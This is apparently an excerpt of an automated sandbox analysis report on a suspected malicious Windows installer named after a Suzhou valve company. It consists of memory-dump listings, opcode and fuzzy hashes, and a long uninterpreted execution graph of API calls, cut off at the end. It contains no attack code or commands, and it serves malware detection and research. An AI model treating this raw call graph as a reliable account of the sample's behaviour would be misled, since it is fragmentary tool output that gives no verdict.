                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                    • Instruction ID: 68da1b5efeb229702bef63955ccdeefd44cba6198d5a5f20aa9a51b41b675f94
                                                                                                    • Opcode Fuzzy Hash: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                    • Instruction Fuzzy Hash: 59E0BFB4A0420ABFFB109F64EC49F7B766CE710704F808521BD15F2250D7B4AC108A79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                    • Instruction ID: 341b99abf03f2e1941eb6220a2ba2fa20bbc036e9949a5bf9c2c078605d2769f
                                                                                                    • Opcode Fuzzy Hash: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                    • Instruction Fuzzy Hash: 9DA13471E00229DBDB28CFA8C8547ADBBB1FF48305F11816AD856BB281C7785A96CF44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                    • Instruction ID: b24004e2459b3715c883c1996b24246953ff0fb47fcdf85fedfa1614f6e92f62
                                                                                                    • Opcode Fuzzy Hash: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                    • Instruction Fuzzy Hash: 60911270E00228DBDF28CF98C854BADBBB1FF44305F15816AD856BB291C7789996CF44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                    • Instruction ID: 0c07c17b414ad8f17a3ff3e8587382d040bd297e960d91c66a6d9af6720fecf2
                                                                                                    • Opcode Fuzzy Hash: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                    • Instruction Fuzzy Hash: 38815571D00228DFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7389A96CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                                                                    • Instruction ID: 40c7cf361161e00566e5adfab28d3a5c75941d24eb7bbcfefb24c15ac497d971
                                                                                                    • Opcode Fuzzy Hash: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                                                                    • Instruction Fuzzy Hash: 91815571D04228DBDF28CFA8C844BADBBB1FB44345F21816AD856BB2C1C7785A96CF45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                                                                    • Instruction ID: 456f5d8fd794945b55b5d9b3679d3b1ecbaa17202882ac546044f61b7aaf63b3
                                                                                                    • Opcode Fuzzy Hash: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                                                                    • Instruction Fuzzy Hash: 10711471D04228DFDF28CF98C844BADBBB1FB48305F15806AD856BB281D7389996DF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                                                                    • Instruction ID: 8bd2b1db5987d4e4b96b583130c6a33f56c1bdc1121660429b57e4b15e5e4dee
                                                                                                    • Opcode Fuzzy Hash: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                                                                    • Instruction Fuzzy Hash: DD713471D04228DFDF28CF98C844BADBBB1FB48305F25806AD856BB291C7389996DF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                                                                    • Instruction ID: b46b7f647ddddaa837b295bcbfdf8fe32b4b15f5abab45eff4fbfa9538c7bc71
                                                                                                    • Opcode Fuzzy Hash: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                                                                    • Instruction Fuzzy Hash: E7712371D04228DFEF28CF98C844BADBBB1FB44305F25806AD856BB291C7789A56DF44
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                    • lstrcmpiA.KERNEL32(00405D97,00000000), ref: 00405B85
                                                                                                    • CharNextA.USER32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B96
                                                                                                    • lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                    • Instruction ID: 495cf0b23cfe7cb5471ae9193bfc392c37a901cc734ec181b4002dd8df2403ac
                                                                                                    • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                    • Instruction Fuzzy Hash: 56F0CD32604458AFC7129FA8CD00D9EBBB8EF06250B2140AAF801F7221D634FE019BA9

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6.3%
                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                    Signature Coverage:3.2%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:77
                                                                                                    execution_graph 37631 44dea5 37632 44deb5 FreeLibrary 37631->37632 37633 44dec3 37631->37633 37632->37633 37634 4287c1 37635 4287d2 37634->37635 37638 429ac1 37634->37638 37639 428818 37635->37639 37640 42881f 37635->37640 37649 425711 37635->37649 37636 4259da 37697 416760 11 API calls 37636->37697 37668 425ad6 37638->37668 37704 415c56 11 API calls 37638->37704 37671 42013a 37639->37671 37699 420244 97 API calls 37640->37699 37642 4260dd 37698 424251 120 API calls 37642->37698 37645 4259c2 37645->37668 37691 415c56 11 API calls 37645->37691 37649->37636 37649->37638 37649->37645 37652 429a4d 37649->37652 37655 422aeb memset memcpy memcpy 37649->37655 37659 4260a1 37649->37659 37667 425a38 37649->37667 37687 4227f0 memset memcpy 37649->37687 37688 422b84 15 API calls 37649->37688 37689 422b5d memset memcpy memcpy 37649->37689 37690 422640 13 API calls 37649->37690 37692 4241fc 11 API calls 37649->37692 37693 42413a 90 API calls 37649->37693 37653 429a66 37652->37653 37654 429a9b 37652->37654 37700 415c56 11 API calls 37653->37700 37658 429a96 37654->37658 37702 416760 11 API calls 37654->37702 37655->37649 37703 424251 120 API calls 37658->37703 37696 415c56 11 API calls 37659->37696 37661 429a7a 37701 416760 11 API calls 37661->37701 37667->37645 37694 422640 13 API calls 37667->37694 37695 4226e0 12 API calls 37667->37695 37672 42014c 37671->37672 37675 420151 37671->37675 37714 41e466 97 API calls 37672->37714 37674 420162 37674->37649 37675->37674 37676 4201b3 37675->37676 37677 420229 37675->37677 37678 4201b8 37676->37678 37679 4201dc 37676->37679 37677->37674 37680 41fd5e 86 API calls 37677->37680 37705 41fbdb 37678->37705 37679->37674 37683 4201ff 37679->37683 37711 41fc4c 37679->37711 37680->37674 37683->37674 37686 42013a 97 API calls 37683->37686 37686->37674 37687->37649 37688->37649 37689->37649 37690->37649 37691->37636 37692->37649 37693->37649 37694->37667 37695->37667 37696->37636 37697->37642 37698->37668 37699->37649 37700->37661 37701->37658 37702->37658 37703->37638 37704->37636 37706 41fbf1 37705->37706 37707 41fbf8 37705->37707 37710 41fc39 37706->37710 37729 4446ce 11 API calls 37706->37729 37719 41ee26 37707->37719 37710->37674 37715 41fd5e 37710->37715 37712 41ee6b 86 API calls 37711->37712 37713 41fc5d 37712->37713 37713->37679 37714->37675 37718 41fd65 37715->37718 37716 41fdab 37716->37674 37717 41fbdb 86 API calls 37717->37718 37718->37716 37718->37717 37720 41ee41 37719->37720 37721 41ee32 37719->37721 37730 41edad 37720->37730 37733 4446ce 11 API calls 37721->37733 37724 41ee3c 37724->37706 37727 41ee58 37727->37724 37735 41ee6b 37727->37735 37729->37710 37739 41be52 37730->37739 37733->37724 37734 41eb85 11 API calls 37734->37727 37736 41ee70 37735->37736 37737 41ee78 37735->37737 37795 41bf99 86 API calls 37736->37795 37737->37724 37740 41be6f 37739->37740 37741 41be5f 37739->37741 37746 41be8c 37740->37746 37760 418c63 37740->37760 37774 4446ce 11 API calls 37741->37774 37743 41be69 37743->37724 37743->37734 37746->37743 37747 41bf3a 37746->37747 37749 41bed1 37746->37749 37751 41bee7 37746->37751 37777 4446ce 11 API calls 37747->37777 37750 41bef0 37749->37750 37753 41bee2 37749->37753 37750->37751 37752 41bf01 37750->37752 37751->37743 37778 41a453 86 API calls 37751->37778 37754 41bf24 memset 37752->37754 37756 41bf14 37752->37756 37775 418a6d memset memcpy memset 37752->37775 37764 41ac13 37753->37764 37754->37743 37776 41a223 memset memcpy memset 37756->37776 37759 41bf20 37759->37754 37762 418c72 37760->37762 37761 418c94 37761->37746 37762->37761 37763 418d51 memset memset 37762->37763 37763->37761 37765 41ac3f memset 37764->37765 37766 41ac52 37764->37766 37771 41acd9 37765->37771 37768 41ac6a 37766->37768 37779 41dc14 19 API calls 37766->37779 37769 41aca1 37768->37769 37780 41519d 37768->37780 37769->37771 37772 41acc0 memset 37769->37772 37773 41accd memcpy 37769->37773 37771->37751 37772->37771 37773->37771 37774->37743 37775->37756 37776->37759 37777->37751 37779->37768 37783 4175ed 37780->37783 37791 417570 SetFilePointer 37783->37791 37786 41760a ReadFile 37787 417637 37786->37787 37788 417627 GetLastError 37786->37788 37789 4151b3 37787->37789 37790 41763e memset 37787->37790 37788->37789 37789->37769 37790->37789 37792 41759c GetLastError 37791->37792 37794 4175b2 37791->37794 37793 4175a8 GetLastError 37792->37793 37792->37794 37793->37794 37794->37786 37794->37789 37795->37737 37796 417bc5 37797 417c61 37796->37797 37798 417bda 37796->37798 37798->37797 37799 417bf6 UnmapViewOfFile CloseHandle 37798->37799 37801 417c2c 37798->37801 37803 4175b7 37798->37803 37799->37798 37799->37799 37801->37798 37808 41851e 20 API calls 37801->37808 37804 4175d6 CloseHandle 37803->37804 37805 4175c8 37804->37805 37806 4175df 37804->37806 37805->37806 37807 4175ce Sleep 37805->37807 37806->37798 37807->37804 37808->37801 37809 4152c7 malloc 37810 4152ef 37809->37810 37812 4152e2 37809->37812 37813 416760 11 API calls 37810->37813 37813->37812 37814 415308 free 37815 41276d 37816 41277d 37815->37816 37858 4044a4 LoadLibraryW 37816->37858 37818 412785 37819 412789 37818->37819 37866 414b81 37818->37866 37822 4127c8 37872 412465 memset ??2@YAPAXI 37822->37872 37824 4127ea 37884 40ac21 37824->37884 37829 412813 37902 40dd07 memset 37829->37902 37830 412827 37907 40db69 memset 37830->37907 37833 412822 37928 4125b6 ??3@YAXPAX 37833->37928 37835 40ada2 _wcsicmp 37837 41283d 37835->37837 37837->37833 37840 412863 CoInitialize 37837->37840 37912 41268e 37837->37912 37932 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37840->37932 37843 41296f 37934 40b633 37843->37934 37845 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37850 412957 CoUninitialize 37845->37850 37855 4128ca 37845->37855 37850->37833 37851 4128d0 TranslateAcceleratorW 37852 412941 GetMessageW 37851->37852 37851->37855 37852->37850 37852->37851 37853 412909 IsDialogMessageW 37853->37852 37853->37855 37854 4128fd IsDialogMessageW 37854->37852 37854->37853 37855->37851 37855->37853 37855->37854 37856 41292b TranslateMessage DispatchMessageW 37855->37856 37857 41291f IsDialogMessageW 37855->37857 37856->37852 37857->37852 37857->37856 37859 4044f7 37858->37859 37860 4044cf GetProcAddress 37858->37860 37864 404507 MessageBoxW 37859->37864 37865 40451e 37859->37865 37861 4044e8 FreeLibrary 37860->37861 37862 4044df 37860->37862 37861->37859 37863 4044f3 37861->37863 37862->37861 37863->37859 37864->37818 37865->37818 37867 414b8a 37866->37867 37868 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37866->37868 37938 40a804 memset 37867->37938 37868->37822 37871 414b9e GetProcAddress 37871->37868 37873 4124e0 37872->37873 37874 412505 ??2@YAPAXI 37873->37874 37875 41251c 37874->37875 37880 412521 37874->37880 37960 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37875->37960 37949 444722 37880->37949 37883 41259b wcscpy 37883->37824 37965 40b1ab free free 37884->37965 37886 40ad76 37966 40aa04 37886->37966 37889 40a9ce malloc memcpy free free 37892 40ac5c 37889->37892 37890 40ad4b 37890->37886 37978 40a9ce 37890->37978 37892->37886 37892->37889 37892->37890 37893 40ace7 free 37892->37893 37969 40a8d0 7 API calls 37892->37969 37970 4099f4 37892->37970 37893->37892 37898 40ada2 37899 40adc9 37898->37899 37900 40adaa 37898->37900 37899->37829 37899->37830 37900->37899 37901 40adb3 _wcsicmp 37900->37901 37901->37899 37901->37900 37984 40dce0 37902->37984 37904 40dd3a GetModuleHandleW 37989 40dba7 37904->37989 37908 40dce0 3 API calls 37907->37908 37909 40db99 37908->37909 38061 40dae1 37909->38061 38075 402f3a 37912->38075 37914 412766 37914->37833 37914->37840 37915 4126d3 _wcsicmp 37916 4126a8 37915->37916 37916->37914 37916->37915 37918 41270a 37916->37918 38109 4125f8 7 API calls 37916->38109 37918->37914 38078 411ac5 37918->38078 37929 4125da 37928->37929 37930 4125f0 37929->37930 37931 4125e6 DeleteObject 37929->37931 37933 40b1ab free free 37930->37933 37931->37930 37932->37845 37933->37843 37935 40b640 37934->37935 37936 40b639 free 37934->37936 37937 40b1ab free free 37935->37937 37936->37935 37937->37819 37939 40a83b GetSystemDirectoryW 37938->37939 37940 40a84c wcscpy 37938->37940 37939->37940 37945 409719 wcslen 37940->37945 37943 40a881 LoadLibraryW 37944 40a886 37943->37944 37944->37868 37944->37871 37946 409724 37945->37946 37947 409739 wcscat LoadLibraryW 37945->37947 37946->37947 37948 40972c wcscat 37946->37948 37947->37943 37947->37944 37948->37947 37950 444732 37949->37950 37951 444728 DeleteObject 37949->37951 37961 409cc3 37950->37961 37951->37950 37953 412551 37954 4010f9 37953->37954 37955 401130 37954->37955 37956 401134 GetModuleHandleW LoadIconW 37955->37956 37957 401107 wcsncat 37955->37957 37958 40a7be 37956->37958 37957->37955 37959 40a7d2 37958->37959 37959->37883 37959->37959 37960->37880 37964 409bfd memset wcscpy 37961->37964 37963 409cdb CreateFontIndirectW 37963->37953 37964->37963 37965->37892 37967 40aa14 37966->37967 37968 40aa0a free 37966->37968 37967->37898 37968->37967 37969->37892 37971 409a41 37970->37971 37972 4099fb malloc 37970->37972 37971->37892 37974 409a37 37972->37974 37975 409a1c 37972->37975 37974->37892 37976 409a30 free 37975->37976 37977 409a20 memcpy 37975->37977 37976->37974 37977->37976 37979 40a9e7 37978->37979 37980 40a9dc free 37978->37980 37981 4099f4 3 API calls 37979->37981 37982 40a9f2 37980->37982 37981->37982 37983 40a8d0 7 API calls 37982->37983 37983->37886 38008 409bca GetModuleFileNameW 37984->38008 37986 40dce6 wcsrchr 37987 40dcf5 37986->37987 37988 40dcf9 wcscat 37986->37988 37987->37988 37988->37904 38009 44db70 37989->38009 37993 40dbfd 38012 4447d9 37993->38012 37996 40dc34 wcscpy wcscpy 38038 40d6f5 37996->38038 37997 40dc1f wcscpy 37997->37996 38000 40d6f5 3 API calls 38001 40dc73 38000->38001 38002 40d6f5 3 API calls 38001->38002 38003 40dc89 38002->38003 38004 40d6f5 3 API calls 38003->38004 38005 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38004->38005 38044 40da80 38005->38044 38008->37986 38010 40dbb4 memset memset 38009->38010 38011 409bca GetModuleFileNameW 38010->38011 38011->37993 38013 4447f4 38012->38013 38014 40dc1b 38013->38014 38015 444807 ??2@YAPAXI 38013->38015 38014->37996 38014->37997 38016 44481f 38015->38016 38017 444873 _snwprintf 38016->38017 38018 4448ab wcscpy 38016->38018 38051 44474a 8 API calls 38017->38051 38020 4448bb 38018->38020 38052 44474a 8 API calls 38020->38052 38021 4448a7 38021->38018 38021->38020 38023 4448cd 38053 44474a 8 API calls 38023->38053 38025 4448e2 38054 44474a 8 API calls 38025->38054 38027 4448f7 38055 44474a 8 API calls 38027->38055 38029 44490c 38056 44474a 8 API calls 38029->38056 38031 444921 38057 44474a 8 API calls 38031->38057 38033 444936 38058 44474a 8 API calls 38033->38058 38035 44494b 38059 44474a 8 API calls 38035->38059 38037 444960 ??3@YAXPAX 38037->38014 38039 44db70 38038->38039 38040 40d702 memset GetPrivateProfileStringW 38039->38040 38041 40d752 38040->38041 38042 40d75c WritePrivateProfileStringW 38040->38042 38041->38042 38043 40d758 38041->38043 38042->38043 38043->38000 38045 44db70 38044->38045 38046 40da8d memset 38045->38046 38047 40daac LoadStringW 38046->38047 38050 40dac6 38047->38050 38049 40dade 38049->37833 38050->38047 38050->38049 38060 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38050->38060 38051->38021 38052->38023 38053->38025 38054->38027 38055->38029 38056->38031 38057->38033 38058->38035 38059->38037 38060->38050 38071 409b98 GetFileAttributesW 38061->38071 38063 40daea 38064 40daef wcscpy wcscpy GetPrivateProfileIntW 38063->38064 38070 40db63 38063->38070 38072 40d65d GetPrivateProfileStringW 38064->38072 38066 40db3e 38073 40d65d GetPrivateProfileStringW 38066->38073 38068 40db4f 38074 40d65d GetPrivateProfileStringW 38068->38074 38070->37835 38071->38063 38072->38066 38073->38068 38074->38070 38110 40eaff 38075->38110 38079 411ae2 memset 38078->38079 38080 411b8f 38078->38080 38150 409bca GetModuleFileNameW 38079->38150 38092 411a8b 38080->38092 38082 411b0a wcsrchr 38083 411b22 wcscat 38082->38083 38084 411b1f 38082->38084 38151 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38083->38151 38084->38083 38086 411b67 38152 402afb 38086->38152 38090 411b7f 38208 40ea13 SendMessageW memset SendMessageW 38090->38208 38093 402afb 27 API calls 38092->38093 38094 411ac0 38093->38094 38095 4110dc 38094->38095 38096 41113e 38095->38096 38101 4110f0 38095->38101 38233 40969c LoadCursorW SetCursor 38096->38233 38098 411143 38234 4032b4 38098->38234 38252 444a54 38098->38252 38099 4110f7 _wcsicmp 38099->38101 38100 411157 38102 40ada2 _wcsicmp 38100->38102 38101->38096 38101->38099 38255 410c46 10 API calls 38101->38255 38105 411167 38102->38105 38103 4111af 38105->38103 38106 4111a6 qsort 38105->38106 38106->38103 38109->37916 38111 40eb10 38110->38111 38123 40e8e0 38111->38123 38114 40eb6c memcpy memcpy 38115 40ebb7 38114->38115 38115->38114 38116 40ebf2 ??2@YAPAXI ??2@YAPAXI 38115->38116 38118 40d134 16 API calls 38115->38118 38117 40ec65 38116->38117 38119 40ec2e ??2@YAPAXI 38116->38119 38133 40ea7f 38117->38133 38118->38115 38119->38117 38122 402f49 38122->37916 38124 40e8f2 38123->38124 38125 40e8eb ??3@YAXPAX 38123->38125 38126 40e900 38124->38126 38127 40e8f9 ??3@YAXPAX 38124->38127 38125->38124 38128 40e911 38126->38128 38129 40e90a ??3@YAXPAX 38126->38129 38127->38126 38130 40e931 ??2@YAPAXI ??2@YAPAXI 38128->38130 38131 40e921 ??3@YAXPAX 38128->38131 38132 40e92a ??3@YAXPAX 38128->38132 38129->38128 38130->38114 38131->38132 38132->38130 38134 40aa04 free 38133->38134 38135 40ea88 38134->38135 38136 40aa04 free 38135->38136 38137 40ea90 38136->38137 38138 40aa04 free 38137->38138 38139 40ea98 38138->38139 38140 40aa04 free 38139->38140 38141 40eaa0 38140->38141 38142 40a9ce 4 API calls 38141->38142 38143 40eab3 38142->38143 38144 40a9ce 4 API calls 38143->38144 38145 40eabd 38144->38145 38146 40a9ce 4 API calls 38145->38146 38147 40eac7 38146->38147 38148 40a9ce 4 API calls 38147->38148 38149 40ead1 38148->38149 38149->38122 38150->38082 38151->38086 38209 40b2cc 38152->38209 38154 402b0a 38155 40b2cc 27 API calls 38154->38155 38156 402b23 38155->38156 38157 40b2cc 27 API calls 38156->38157 38158 402b3a 38157->38158 38159 40b2cc 27 API calls 38158->38159 38160 402b54 38159->38160 38161 40b2cc 27 API calls 38160->38161 38162 402b6b 38161->38162 38163 40b2cc 27 API calls 38162->38163 38164 402b82 38163->38164 38165 40b2cc 27 API calls 38164->38165 38166 402b99 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402bb0 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402bc7 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402bde 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402bf5 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402c0c 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402c23 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402c3a 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402c51 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402c68 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402c7f 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402c99 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402cb3 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402cd5 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402cf0 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402d0b 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402d26 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402d3e 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402d59 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402d78 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402d93 38205->38206 38207 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics 